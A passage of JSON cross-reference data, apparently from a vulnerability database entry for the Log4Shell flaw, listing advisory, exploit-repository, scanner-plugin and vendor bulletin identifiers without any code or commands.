"4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-JFH8-C2JP-5V3Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "14482532-2406-58DF-89FF-30B085015257", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26905C55-5DC7-5275-A0AF-FAF06685612E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "604B2FE5-9DF8-5C70-878D-2CCFAA39A6C1", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "70582B5B-E1E6-5767-94A6-39740A96A052", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9C874FAC-8640-5978-8C60-AF6528E5DF60", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4A33F39-BA6F-5AC0-B72C-30F0E4D6CD56", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B5D61CFC-8A10-5D92-B72B-D002C1D7AF33", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9B4FADB-2546-5DFD-A26E-B1FC4C07FCE7", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C6493FD0-579F-593F-A1E9-A44793F70419", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DE88B6AE-5D54-5B49-A097-57038C720463", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E07C4625-66EE-5E09-880C-251E6273C21A", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EBBBCCE8-232D-5227-B6F8-A797B6B8D4ED", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1427589", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:205916945365E4C9EB9829951A82295A"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "26DFDDEA8EB90F9881D2DF1DF2281A85874E3DEDC9CAEBB69B263FC6408C7D49", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7D41EC7322B1884F1456683D61F0429C832EB63621E340A85374D62A5B50036A", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8B3A7050651CC6061B73CF1E86EE2419DD50F4F27FC07E4130D25ADDF14EFCF8", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "A150C2E017839DE1F5CBC686332D12515358F881E715C75E1B2D5509C5D5362A", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "FACE47A144B851A6BB630C0FD63FA2BFBE0A19AFE0A7E1A993E530FC0BA6BE90"]}, {"type": "ics", "idList": ["ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12391", "KLA12392", "KLA12393"]}, {"type": "kitploit", "idList": ["KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/LOG4SHELL_SCANNER/", "MSF:EXPLOIT/MULTI/HTTP/LOG4SHELL_HEADER_INJECTION/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "ALA_ALAS-2021-1553.NASL", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_1_2.NASL", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2022.NASL", "REDHAT-RHSA-2021-5206.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-5206", "ELSA-2022-0290", "ELSA-2022-9056"]}, {"type": "packetstorm", "idList": 